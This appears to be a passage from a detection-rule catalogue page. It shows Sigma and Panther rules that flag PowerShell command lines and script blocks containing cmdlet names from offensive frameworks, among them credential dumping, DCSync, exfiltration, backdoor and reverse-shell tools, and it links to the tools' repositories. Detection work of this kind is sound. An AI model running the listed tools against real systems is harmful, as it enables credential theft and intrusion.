            - 'Enable-ADIDNSNode'
            - 'Enable-MachineAccount'
            - 'Enabled-DuplicateToken'
            - 'Exploit-Jboss'
            - 'Export-ADR' # # ADRecon related cmdlets
            - 'Export-ADRCSV' # # ADRecon related cmdlets
            - 'Export-ADRExcel' # # ADRecon related cmdlets
            - 'Export-ADRHTML' # # ADRecon related cmdlets
            - 'Export-ADRJSON' # # ADRecon related cmdlets
            - 'Export-ADRXML' # # ADRecon related cmdlets
            - 'Find-Fruit'
            - 'Find-GPOLocation'
            - 'Find-TrustedDocuments'
            - 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone
            - 'Get-ApplicationHost'
            - 'Get-ChromeDump'
            - 'Get-ClipboardContents'
            - 'Get-FoxDump'
            - 'Get-GPPPassword'
            - 'Get-IndexedItem'
            - 'Get-KerberosAESKey'
            - 'Get-Keystrokes'
            - 'Get-LSASecret'
            - 'Get-MachineAccountAttribute'
            - 'Get-MachineAccountCreator'
            - 'Get-PassHashes'
            - 'Get-RegAlwaysInstallElevated'
            - 'Get-RegAutoLogon'
            - 'Get-RemoteBootKey'
            - 'Get-RemoteCachedCredential'
            - 'Get-RemoteLocalAccountHash'
            - 'Get-RemoteLSAKey'
            - 'Get-RemoteMachineAccountHash'
            - 'Get-RemoteNLKMKey'
            - 'Get-RickAstley'
            - 'Get-Screenshot'
            - 'Get-SecurityPackages'
            - 'Get-ServiceFilePermission'
            - 'Get-ServicePermission'
            - 'Get-ServiceUnquoted'
            - 'Get-SiteListPassword'
            - 'Get-System'
            - 'Get-TimedScreenshot'
            - 'Get-UnattendedInstallFile'
            - 'Get-Unconstrained'
            - 'Get-USBKeystrokes'
            - 'Get-VaultCredential'
            - 'Get-VulnAutoRun'
            - 'Get-VulnSchTask'
            - 'Grant-ADIDNSPermission'
            - 'Gupt-Backdoor'
            - 'HTTP-Login'
            - 'Install-ServiceBinary'
            - 'Install-SSP'
            - 'Invoke-ACLScanner'
            - 'Invoke-ADRecon' # # ADRecon related cmdlets
            - 'Invoke-ADSBackdoor'
            - 'Invoke-AgentSmith'
            - 'Invoke-AllChecks'
            - 'Invoke-ARPScan'
            - 'Invoke-AzureHound'
            - 'Invoke-BackdoorLNK'
            - 'Invoke-BadPotato'
            - 'Invoke-BetterSafetyKatz'
            - 'Invoke-BypassUAC'
            - 'Invoke-Carbuncle'
            - 'Invoke-Certify'
            - 'Invoke-ConPtyShell'
            - 'Invoke-CredentialInjection'
            - 'Invoke-DAFT'
            - 'Invoke-DCSync'
            - 'Invoke-DinvokeKatz'
            - 'Invoke-DllInjection'
            - 'Invoke-DNSUpdate'
            - 'Invoke-DNSExfiltrator'
            - 'Invoke-DomainPasswordSpray'
            - 'Invoke-DowngradeAccount'
            - 'Invoke-EgressCheck'
            - 'Invoke-Eyewitness'
            - 'Invoke-FakeLogonScreen'
            - 'Invoke-Farmer'
            - 'Invoke-Get-RBCD-Threaded'
            - 'Invoke-Gopher'
            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX
            - 'Invoke-HandleKatz'
            - 'Invoke-ImpersonatedProcess'
            - 'Invoke-ImpersonateSystem'
            - 'Invoke-InteractiveSystemPowerShell'
            - 'Invoke-Internalmonologue'
            - 'Invoke-Inveigh'
            - 'Invoke-InveighRelay'
            - 'Invoke-KrbRelay'
            - 'Invoke-LdapSignCheck'
            - 'Invoke-Lockless'
            - 'Invoke-MalSCCM'
            - 'Invoke-Mimikatz'
            - 'Invoke-Mimikittenz'
            - 'Invoke-MITM6'
            - 'Invoke-NanoDump'
            - 'Invoke-NetRipper'
            - 'Invoke-Nightmare'
            - 'Invoke-NinjaCopy'
            - 'Invoke-OfficeScrape'
            - 'Invoke-OxidResolver'
            - 'Invoke-P0wnedshell'
            - 'Invoke-Paranoia'
            - 'Invoke-PortScan'
            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps
            - 'Invoke-PostExfil'
            - 'Invoke-PowerDump'
            - 'Invoke-PowerDPAPI'
            - 'Invoke-PowerShellTCP'
            - 'Invoke-PowerShellWMI'
            - 'Invoke-PPLDump'
            - 'Invoke-PsExec'
            - 'Invoke-PSInject'
            - 'Invoke-PsUaCme'
            - 'Invoke-ReflectivePEInjection'
            - 'Invoke-ReverseDNSLookup'
            - 'Invoke-Rubeus'
            - 'Invoke-RunAs'
            - 'Invoke-SafetyKatz'
            - 'Invoke-SauronEye'
            - 'Invoke-SCShell'
            - 'Invoke-Seatbelt'
            - 'Invoke-ServiceAbuse'
            - 'Invoke-ShadowSpray'
            - 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
            - 'Invoke-Shellcode'
            - 'Invoke-SMBScanner'
            - 'Invoke-Snaffler'
            - 'Invoke-Spoolsample'
            - 'Invoke-SpraySinglePassword'
            - 'Invoke-SSHCommand'
            - 'Invoke-StandIn'
            - 'Invoke-StickyNotesExtract'
            - 'Invoke-SystemCommand'
            - 'Invoke-Tasksbackdoor'
            - 'Invoke-Tater'
            - 'Invoke-Thunderfox'
            - 'Invoke-ThunderStruck'
            - 'Invoke-TokenManipulation'
            - 'Invoke-Tokenvator'
            - 'Invoke-TotalExec'
            - 'Invoke-UrbanBishop'
            - 'Invoke-UserHunter'
            - 'Invoke-VoiceTroll'
            - 'Invoke-Whisker'
            - 'Invoke-WinEnum'
            - 'Invoke-winPEAS'
            - 'Invoke-WireTap'
            - 'Invoke-WmiCommand'
            - 'Invoke-WMIExec'
            - 'Invoke-WScriptBypassUAC'
            - 'Invoke-Zerologon'
            - 'MailRaider'
            - 'New-ADIDNSNode'
            - 'New-DNSRecordArray'
            - 'New-HoneyHash'
            - 'New-InMemoryModule'
            - 'New-MachineAccount'
            - 'New-SOASerialNumberArray'
            - 'Out-Minidump'
            - 'Port-Scan'
            - 'PowerBreach'
            - 'powercat '
            - 'PowerUp'
            - 'PowerView'
            - 'Remove-ADIDNSNode'
            - 'Remove-MachineAccount'
            - 'Remove-Update'
            - 'Rename-ADIDNSNode'
            - 'Revoke-ADIDNSPermission'
            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner
            - 'Set-MacAttribute'
            - 'Set-MachineAccountAttribute'
            - 'Set-Wallpaper'
            - 'Show-TargetScreen'
            - 'Start-CaptureServer'
            - 'Start-Dnscat2'
            - 'Start-WebcamRecorder'
            - 'Veeam-Get-Creds'
            - 'VolumeShadowCopyTools'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious PowerShell Commandlets - ProcessCreation

Detects Commandlet names from well-known PowerShell exploitation frameworks

status test author Nasreddine Bencherchali (Nextron Systems) id 02030f2f-6199-49ec-b258-ea71b07e03dc

panther query

def rule(event):
    if any(
        [
            "Add-Exfiltration" in event.deep_get("CommandLine", default=""),
            "Add-Persistence" in event.deep_get("CommandLine", default=""),
            "Add-RegBackdoor" in event.deep_get("CommandLine", default=""),
            "Add-RemoteRegBackdoor" in event.deep_get("CommandLine", default=""),
            "Add-ScrnSaveBackdoor" in event.deep_get("CommandLine", default=""),
            "Check-VM" in event.deep_get("CommandLine", default=""),
            "ConvertTo-Rc4ByteStream" in event.deep_get("CommandLine", default=""),
            "Decrypt-Hash" in event.deep_get("CommandLine", default=""),
            "Disable-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Disable-MachineAccount" in event.deep_get("CommandLine", default=""),
            "Do-Exfiltration" in event.deep_get("CommandLine", default=""),
            "Enable-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Enable-MachineAccount" in event.deep_get("CommandLine", default=""),
            "Enabled-DuplicateToken" in event.deep_get("CommandLine", default=""),
            "Exploit-Jboss" in event.deep_get("CommandLine", default=""),
            "Export-ADR" in event.deep_get("CommandLine", default=""),
            "Export-ADRCSV" in event.deep_get("CommandLine", default=""),
            "Export-ADRExcel" in event.deep_get("CommandLine", default=""),
            "Export-ADRHTML" in event.deep_get("CommandLine", default=""),
            "Export-ADRJSON" in event.deep_get("CommandLine", default=""),
            "Export-ADRXML" in event.deep_get("CommandLine", default=""),
            "Find-Fruit" in event.deep_get("CommandLine", default=""),
            "Find-GPOLocation" in event.deep_get("CommandLine", default=""),
            "Find-TrustedDocuments" in event.deep_get("CommandLine", default=""),
            "Get-ADIDNS" in event.deep_get("CommandLine", default=""),
            "Get-ApplicationHost" in event.deep_get("CommandLine", default=""),
            "Get-ChromeDump" in event.deep_get("CommandLine", default=""),
            "Get-ClipboardContents" in event.deep_get("CommandLine", default=""),
            "Get-FoxDump" in event.deep_get("CommandLine", default=""),
            "Get-GPPPassword" in event.deep_get("CommandLine", default=""),
            "Get-IndexedItem" in event.deep_get("CommandLine", default=""),
            "Get-KerberosAESKey" in event.deep_get("CommandLine", default=""),
            "Get-Keystrokes" in event.deep_get("CommandLine", default=""),
            "Get-LSASecret" in event.deep_get("CommandLine", default=""),
            "Get-MachineAccountAttribute" in event.deep_get("CommandLine", default=""),
            "Get-MachineAccountCreator" in event.deep_get("CommandLine", default=""),
            "Get-PassHashes" in event.deep_get("CommandLine", default=""),
            "Get-RegAlwaysInstallElevated" in event.deep_get("CommandLine", default=""),
            "Get-RegAutoLogon" in event.deep_get("CommandLine", default=""),
            "Get-RemoteBootKey" in event.deep_get("CommandLine", default=""),
            "Get-RemoteCachedCredential" in event.deep_get("CommandLine", default=""),
            "Get-RemoteLocalAccountHash" in event.deep_get("CommandLine", default=""),
            "Get-RemoteLSAKey" in event.deep_get("CommandLine", default=""),
            "Get-RemoteMachineAccountHash" in event.deep_get("CommandLine", default=""),
            "Get-RemoteNLKMKey" in event.deep_get("CommandLine", default=""),
            "Get-RickAstley" in event.deep_get("CommandLine", default=""),
            "Get-Screenshot" in event.deep_get("CommandLine", default=""),
            "Get-SecurityPackages" in event.deep_get("CommandLine", default=""),
            "Get-ServiceFilePermission" in event.deep_get("CommandLine", default=""),
            "Get-ServicePermission" in event.deep_get("CommandLine", default=""),
            "Get-ServiceUnquoted" in event.deep_get("CommandLine", default=""),
            "Get-SiteListPassword" in event.deep_get("CommandLine", default=""),
            "Get-System" in event.deep_get("CommandLine", default=""),
            "Get-TimedScreenshot" in event.deep_get("CommandLine", default=""),
            "Get-UnattendedInstallFile" in event.deep_get("CommandLine", default=""),
            "Get-Unconstrained" in event.deep_get("CommandLine", default=""),
            "Get-USBKeystrokes" in event.deep_get("CommandLine", default=""),
            "Get-VaultCredential" in event.deep_get("CommandLine", default=""),
            "Get-VulnAutoRun" in event.deep_get("CommandLine", default=""),
            "Get-VulnSchTask" in event.deep_get("CommandLine", default=""),
            "Grant-ADIDNSPermission" in event.deep_get("CommandLine", default=""),
            "Gupt-Backdoor" in event.deep_get("CommandLine", default=""),
            "HTTP-Login" in event.deep_get("CommandLine", default=""),
            "Install-ServiceBinary" in event.deep_get("CommandLine", default=""),
            "Install-SSP" in event.deep_get("CommandLine", default=""),
            "Invoke-ACLScanner" in event.deep_get("CommandLine", default=""),
            "Invoke-ADRecon" in event.deep_get("CommandLine", default=""),
            "Invoke-ADSBackdoor" in event.deep_get("CommandLine", default=""),
            "Invoke-AgentSmith" in event.deep_get("CommandLine", default=""),
            "Invoke-AllChecks" in event.deep_get("CommandLine", default=""),
            "Invoke-ARPScan" in event.deep_get("CommandLine", default=""),
            "Invoke-AzureHound" in event.deep_get("CommandLine", default=""),
            "Invoke-BackdoorLNK" in event.deep_get("CommandLine", default=""),
            "Invoke-BadPotato" in event.deep_get("CommandLine", default=""),
            "Invoke-BetterSafetyKatz" in event.deep_get("CommandLine", default=""),
            "Invoke-BypassUAC" in event.deep_get("CommandLine", default=""),
            "Invoke-Carbuncle" in event.deep_get("CommandLine", default=""),
            "Invoke-Certify" in event.deep_get("CommandLine", default=""),
            "Invoke-ConPtyShell" in event.deep_get("CommandLine", default=""),
            "Invoke-CredentialInjection" in event.deep_get("CommandLine", default=""),
            "Invoke-DAFT" in event.deep_get("CommandLine", default=""),
            "Invoke-DCSync" in event.deep_get("CommandLine", default=""),
            "Invoke-DinvokeKatz" in event.deep_get("CommandLine", default=""),
            "Invoke-DllInjection" in event.deep_get("CommandLine", default=""),
            "Invoke-DNSUpdate" in event.deep_get("CommandLine", default=""),
            "Invoke-DNSExfiltrator" in event.deep_get("CommandLine", default=""),
            "Invoke-DomainPasswordSpray" in event.deep_get("CommandLine", default=""),
            "Invoke-DowngradeAccount" in event.deep_get("CommandLine", default=""),
            "Invoke-EgressCheck" in event.deep_get("CommandLine", default=""),
            "Invoke-Eyewitness" in event.deep_get("CommandLine", default=""),
            "Invoke-FakeLogonScreen" in event.deep_get("CommandLine", default=""),
            "Invoke-Farmer" in event.deep_get("CommandLine", default=""),
            "Invoke-Get-RBCD-Threaded" in event.deep_get("CommandLine", default=""),
            "Invoke-Gopher" in event.deep_get("CommandLine", default=""),
            "Invoke-Grouper" in event.deep_get("CommandLine", default=""),
            "Invoke-HandleKatz" in event.deep_get("CommandLine", default=""),
            "Invoke-ImpersonatedProcess" in event.deep_get("CommandLine", default=""),
            "Invoke-ImpersonateSystem" in event.deep_get("CommandLine", default=""),
            "Invoke-InteractiveSystemPowerShell" in event.deep_get("CommandLine", default=""),
            "Invoke-Internalmonologue" in event.deep_get("CommandLine", default=""),
            "Invoke-Inveigh" in event.deep_get("CommandLine", default=""),
            "Invoke-InveighRelay" in event.deep_get("CommandLine", default=""),
            "Invoke-KrbRelay" in event.deep_get("CommandLine", default=""),
            "Invoke-LdapSignCheck" in event.deep_get("CommandLine", default=""),
            "Invoke-Lockless" in event.deep_get("CommandLine", default=""),
            "Invoke-MalSCCM" in event.deep_get("CommandLine", default=""),
            "Invoke-Mimikatz" in event.deep_get("CommandLine", default=""),
            "Invoke-Mimikittenz" in event.deep_get("CommandLine", default=""),
            "Invoke-MITM6" in event.deep_get("CommandLine", default=""),
            "Invoke-NanoDump" in event.deep_get("CommandLine", default=""),
            "Invoke-NetRipper" in event.deep_get("CommandLine", default=""),
            "Invoke-Nightmare" in event.deep_get("CommandLine", default=""),
            "Invoke-NinjaCopy" in event.deep_get("CommandLine", default=""),
            "Invoke-OfficeScrape" in event.deep_get("CommandLine", default=""),
            "Invoke-OxidResolver" in event.deep_get("CommandLine", default=""),
            "Invoke-P0wnedshell" in event.deep_get("CommandLine", default=""),
            "Invoke-Paranoia" in event.deep_get("CommandLine", default=""),
            "Invoke-PortScan" in event.deep_get("CommandLine", default=""),
            "Invoke-PoshRatHttp" in event.deep_get("CommandLine", default=""),
            "Invoke-PostExfil" in event.deep_get("CommandLine", default=""),
            "Invoke-PowerDump" in event.deep_get("CommandLine", default=""),
            "Invoke-PowerDPAPI" in event.deep_get("CommandLine", default=""),
            "Invoke-PowerShellTCP" in event.deep_get("CommandLine", default=""),
            "Invoke-PowerShellWMI" in event.deep_get("CommandLine", default=""),
            "Invoke-PPLDump" in event.deep_get("CommandLine", default=""),
            "Invoke-PsExec" in event.deep_get("CommandLine", default=""),
            "Invoke-PSInject" in event.deep_get("CommandLine", default=""),
            "Invoke-PsUaCme" in event.deep_get("CommandLine", default=""),
            "Invoke-ReflectivePEInjection" in event.deep_get("CommandLine", default=""),
            "Invoke-ReverseDNSLookup" in event.deep_get("CommandLine", default=""),
            "Invoke-Rubeus" in event.deep_get("CommandLine", default=""),
            "Invoke-RunAs" in event.deep_get("CommandLine", default=""),
            "Invoke-SafetyKatz" in event.deep_get("CommandLine", default=""),
            "Invoke-SauronEye" in event.deep_get("CommandLine", default=""),
            "Invoke-SCShell" in event.deep_get("CommandLine", default=""),
            "Invoke-Seatbelt" in event.deep_get("CommandLine", default=""),
            "Invoke-ServiceAbuse" in event.deep_get("CommandLine", default=""),
            "Invoke-ShadowSpray" in event.deep_get("CommandLine", default=""),
            "Invoke-Sharp" in event.deep_get("CommandLine", default=""),
            "Invoke-Shellcode" in event.deep_get("CommandLine", default=""),
            "Invoke-SMBScanner" in event.deep_get("CommandLine", default=""),
            "Invoke-Snaffler" in event.deep_get("CommandLine", default=""),
            "Invoke-Spoolsample" in event.deep_get("CommandLine", default=""),
            "Invoke-SpraySinglePassword" in event.deep_get("CommandLine", default=""),
            "Invoke-SSHCommand" in event.deep_get("CommandLine", default=""),
            "Invoke-StandIn" in event.deep_get("CommandLine", default=""),
            "Invoke-StickyNotesExtract" in event.deep_get("CommandLine", default=""),
            "Invoke-SystemCommand" in event.deep_get("CommandLine", default=""),
            "Invoke-Tasksbackdoor" in event.deep_get("CommandLine", default=""),
            "Invoke-Tater" in event.deep_get("CommandLine", default=""),
            "Invoke-Thunderfox" in event.deep_get("CommandLine", default=""),
            "Invoke-ThunderStruck" in event.deep_get("CommandLine", default=""),
            "Invoke-TokenManipulation" in event.deep_get("CommandLine", default=""),
            "Invoke-Tokenvator" in event.deep_get("CommandLine", default=""),
            "Invoke-TotalExec" in event.deep_get("CommandLine", default=""),
            "Invoke-UrbanBishop" in event.deep_get("CommandLine", default=""),
            "Invoke-UserHunter" in event.deep_get("CommandLine", default=""),
            "Invoke-VoiceTroll" in event.deep_get("CommandLine", default=""),
            "Invoke-Whisker" in event.deep_get("CommandLine", default=""),
            "Invoke-WinEnum" in event.deep_get("CommandLine", default=""),
            "Invoke-winPEAS" in event.deep_get("CommandLine", default=""),
            "Invoke-WireTap" in event.deep_get("CommandLine", default=""),
            "Invoke-WmiCommand" in event.deep_get("CommandLine", default=""),
            "Invoke-WMIExec" in event.deep_get("CommandLine", default=""),
            "Invoke-WScriptBypassUAC" in event.deep_get("CommandLine", default=""),
            "Invoke-Zerologon" in event.deep_get("CommandLine", default=""),
            "MailRaider" in event.deep_get("CommandLine", default=""),
            "New-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "New-DNSRecordArray" in event.deep_get("CommandLine", default=""),
            "New-HoneyHash" in event.deep_get("CommandLine", default=""),
            "New-InMemoryModule" in event.deep_get("CommandLine", default=""),
            "New-MachineAccount" in event.deep_get("CommandLine", default=""),
            "New-SOASerialNumberArray" in event.deep_get("CommandLine", default=""),
            "Out-Minidump" in event.deep_get("CommandLine", default=""),
            "Port-Scan" in event.deep_get("CommandLine", default=""),
            "PowerBreach" in event.deep_get("CommandLine", default=""),
            "powercat " in event.deep_get("CommandLine", default=""),
            "PowerUp" in event.deep_get("CommandLine", default=""),
            "PowerView" in event.deep_get("CommandLine", default=""),
            "Remove-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Remove-MachineAccount" in event.deep_get("CommandLine", default=""),
            "Remove-Update" in event.deep_get("CommandLine", default=""),
            "Rename-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Revoke-ADIDNSPermission" in event.deep_get("CommandLine", default=""),
            "Set-ADIDNSNode" in event.deep_get("CommandLine", default=""),
            "Set-MacAttribute" in event.deep_get("CommandLine", default=""),
            "Set-MachineAccountAttribute" in event.deep_get("CommandLine", default=""),
            "Set-Wallpaper" in event.deep_get("CommandLine", default=""),
            "Show-TargetScreen" in event.deep_get("CommandLine", default=""),
            "Start-CaptureServer" in event.deep_get("CommandLine", default=""),
            "Start-Dnscat2" in event.deep_get("CommandLine", default=""),
            "Start-WebcamRecorder" in event.deep_get("CommandLine", default=""),
            "Veeam-Get-Creds" in event.deep_get("CommandLine", default=""),
            "VolumeShadowCopyTools" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malicious PowerShell Commandlets - ProcessCreation
id: 02030f2f-6199-49ec-b258-ea71b07e03dc
related:
    - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
      type: derived
    - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
      type: similar
status: test
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
    - https://adsecurity.org/?p=2921
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare
    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/Kevin-Robertson/Powermad
    - https://github.com/adrecon/ADRecon
    - https://github.com/adrecon/AzureADRecon
    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-02
modified: 2025-12-10
tags:
    - attack.execution
    - attack.discovery
    - attack.t1482
    - attack.t1087
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1069.001
    - attack.t1069.002
    - attack.t1069
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # Note: Please ensure alphabetical order when adding new entries
        CommandLine|contains:
            - 'Add-Exfiltration'
            - 'Add-Persistence'
            - 'Add-RegBackdoor'
            - 'Add-RemoteRegBackdoor'
            - 'Add-ScrnSaveBackdoor'
            - 'Check-VM'
            - 'ConvertTo-Rc4ByteStream'
            - 'Decrypt-Hash'
            - 'Disable-ADIDNSNode'
            - 'Disable-MachineAccount'
            - 'Do-Exfiltration'
            - 'Enable-ADIDNSNode'
            - 'Enable-MachineAccount'
            - 'Enabled-DuplicateToken'
            - 'Exploit-Jboss'
            - 'Export-ADR'
            - 'Export-ADRCSV'
            - 'Export-ADRExcel'
            - 'Export-ADRHTML'
            - 'Export-ADRJSON'
            - 'Export-ADRXML'
            - 'Find-Fruit'
            - 'Find-GPOLocation'
            - 'Find-TrustedDocuments'
            - 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone
            - 'Get-ApplicationHost'
            - 'Get-ChromeDump'
            - 'Get-ClipboardContents'
            - 'Get-FoxDump'
            - 'Get-GPPPassword'
            - 'Get-IndexedItem'
            - 'Get-KerberosAESKey'
            - 'Get-Keystrokes'
            - 'Get-LSASecret'
            - 'Get-MachineAccountAttribute'
            - 'Get-MachineAccountCreator'
            - 'Get-PassHashes'
            - 'Get-RegAlwaysInstallElevated'
            - 'Get-RegAutoLogon'
            - 'Get-RemoteBootKey'
            - 'Get-RemoteCachedCredential'
            - 'Get-RemoteLocalAccountHash'
            - 'Get-RemoteLSAKey'
            - 'Get-RemoteMachineAccountHash'
            - 'Get-RemoteNLKMKey'
            - 'Get-RickAstley'
            - 'Get-Screenshot'
            - 'Get-SecurityPackages'
            - 'Get-ServiceFilePermission'
            - 'Get-ServicePermission'
            - 'Get-ServiceUnquoted'
            - 'Get-SiteListPassword'
            - 'Get-System'
            - 'Get-TimedScreenshot'
            - 'Get-UnattendedInstallFile'
            - 'Get-Unconstrained'
            - 'Get-USBKeystrokes'
            - 'Get-VaultCredential'
            - 'Get-VulnAutoRun'
            - 'Get-VulnSchTask'
            - 'Grant-ADIDNSPermission'
            - 'Gupt-Backdoor'
            - 'HTTP-Login'
            - 'Install-ServiceBinary'
            - 'Install-SSP'
            - 'Invoke-ACLScanner'
            - 'Invoke-ADRecon'
            - 'Invoke-ADSBackdoor'
            - 'Invoke-AgentSmith'
            - 'Invoke-AllChecks'
            - 'Invoke-ARPScan'
            - 'Invoke-AzureHound'
            - 'Invoke-BackdoorLNK'
            - 'Invoke-BadPotato'
            - 'Invoke-BetterSafetyKatz'
            - 'Invoke-BypassUAC'
            - 'Invoke-Carbuncle'
            - 'Invoke-Certify'
            - 'Invoke-ConPtyShell'
            - 'Invoke-CredentialInjection'
            - 'Invoke-DAFT'
            - 'Invoke-DCSync'
            - 'Invoke-DinvokeKatz'
            - 'Invoke-DllInjection'
            - 'Invoke-DNSUpdate'
            - 'Invoke-DNSExfiltrator'
            - 'Invoke-DomainPasswordSpray'
            - 'Invoke-DowngradeAccount'
            - 'Invoke-EgressCheck'
            - 'Invoke-Eyewitness'
            - 'Invoke-FakeLogonScreen'
            - 'Invoke-Farmer'
            - 'Invoke-Get-RBCD-Threaded'
            - 'Invoke-Gopher'
            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX
            - 'Invoke-HandleKatz'
            - 'Invoke-ImpersonatedProcess'
            - 'Invoke-ImpersonateSystem'
            - 'Invoke-InteractiveSystemPowerShell'
            - 'Invoke-Internalmonologue'
            - 'Invoke-Inveigh'
            - 'Invoke-InveighRelay'
            - 'Invoke-KrbRelay'
            - 'Invoke-LdapSignCheck'
            - 'Invoke-Lockless'
            - 'Invoke-MalSCCM'
            - 'Invoke-Mimikatz'
            - 'Invoke-Mimikittenz'
            - 'Invoke-MITM6'
            - 'Invoke-NanoDump'
            - 'Invoke-NetRipper'
            - 'Invoke-Nightmare'
            - 'Invoke-NinjaCopy'
            - 'Invoke-OfficeScrape'
            - 'Invoke-OxidResolver'
            - 'Invoke-P0wnedshell'
            - 'Invoke-Paranoia'
            - 'Invoke-PortScan'
            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps
            - 'Invoke-PostExfil'
            - 'Invoke-PowerDump'
            - 'Invoke-PowerDPAPI'
            - 'Invoke-PowerShellTCP'
            - 'Invoke-PowerShellWMI'
            - 'Invoke-PPLDump'
            - 'Invoke-PsExec'
            - 'Invoke-PSInject'
            - 'Invoke-PsUaCme'
            - 'Invoke-ReflectivePEInjection'
            - 'Invoke-ReverseDNSLookup'
            - 'Invoke-Rubeus'
            - 'Invoke-RunAs'
            - 'Invoke-SafetyKatz'
            - 'Invoke-SauronEye'
            - 'Invoke-SCShell'
            - 'Invoke-Seatbelt'
            - 'Invoke-ServiceAbuse'
            - 'Invoke-ShadowSpray'
            - 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
            - 'Invoke-Shellcode'
            - 'Invoke-SMBScanner'
            - 'Invoke-Snaffler'
            - 'Invoke-Spoolsample'
            - 'Invoke-SpraySinglePassword'
            - 'Invoke-SSHCommand'
            - 'Invoke-StandIn'
            - 'Invoke-StickyNotesExtract'
            - 'Invoke-SystemCommand'
            - 'Invoke-Tasksbackdoor'
            - 'Invoke-Tater'
            - 'Invoke-Thunderfox'
            - 'Invoke-ThunderStruck'
            - 'Invoke-TokenManipulation'
            - 'Invoke-Tokenvator'
            - 'Invoke-TotalExec'
            - 'Invoke-UrbanBishop'
            - 'Invoke-UserHunter'
            - 'Invoke-VoiceTroll'
            - 'Invoke-Whisker'
            - 'Invoke-WinEnum'
            - 'Invoke-winPEAS'
            - 'Invoke-WireTap'
            - 'Invoke-WmiCommand'
            - 'Invoke-WMIExec'
            - 'Invoke-WScriptBypassUAC'
            - 'Invoke-Zerologon'
            - 'MailRaider'
            - 'New-ADIDNSNode'
            - 'New-DNSRecordArray'
            - 'New-HoneyHash'
            - 'New-InMemoryModule'
            - 'New-MachineAccount'
            - 'New-SOASerialNumberArray'
            - 'Out-Minidump'
            - 'Port-Scan'
            - 'PowerBreach'
            - 'powercat '
            - 'PowerUp'
            - 'PowerView'
            - 'Remove-ADIDNSNode'
            - 'Remove-MachineAccount'
            - 'Remove-Update'
            - 'Rename-ADIDNSNode'
            - 'Revoke-ADIDNSPermission'
            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner
            - 'Set-MacAttribute'
            - 'Set-MachineAccountAttribute'
            - 'Set-Wallpaper'
            - 'Show-TargetScreen'
            - 'Start-CaptureServer'
            - 'Start-Dnscat2'
            - 'Start-WebcamRecorder'
            - 'Veeam-Get-Creds'
            - 'VolumeShadowCopyTools'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malicious PowerShell Commandlets - ScriptBlock

Detects Commandlet names from well-known PowerShell exploitation frameworks

status test author Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer id 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6

panther query

def rule(event):
    if all(
        [
            any(
                [
                    "Add-Exfiltration" in event.deep_get("ScriptBlockText", default=""),
                    "Add-Persistence" in event.deep_get("ScriptBlockText", default=""),
                    "Add-RegBackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Add-RemoteRegBackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Add-ScrnSaveBackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "ConvertTo-Rc4ByteStream" in event.deep_get("ScriptBlockText", default=""),
                    "Decrypt-Hash" in event.deep_get("ScriptBlockText", default=""),
                    "Disable-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
